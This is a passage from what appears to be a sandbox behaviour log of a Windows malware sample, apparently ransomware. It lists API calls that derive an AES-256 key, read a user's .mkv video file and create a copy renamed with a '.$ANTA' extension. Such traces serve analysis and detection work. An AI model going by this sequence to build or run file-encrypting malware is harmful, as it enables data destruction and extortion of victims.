lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0105.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0105.744] CryptHashData (hHash=0x41ac780, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0105.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0105.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cadf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0105.745] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac000) returned 1 [0105.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0105.745] CryptDestroyHash (hHash=0x41ac780) returned 1 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0105.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0105.746] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0105.746] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0105.746] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.747] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\jgiui-yvs0307rw icx.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0105.747] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.747] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0105.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.747] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0105.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0105.748] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0105.748] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7a58 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7e48 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8628 [0105.749] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8628 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7a58 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0105.750] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\jgiui-yvs0307rw icx.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0105.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.751] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0105.751] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0105.751] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0105.751] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0105.754] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0105.754] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x3394, lpOverlapped=0x0) returned 1 [0105.755] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0105.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0105.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3394) returned 0x4516010 [0105.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3394) returned 0x45193b0 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.759] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3394) returned 0x4516010 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0105.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.759] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0105.760] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.760] RtlAllocateHeap (HeapHandle=0x1780000, 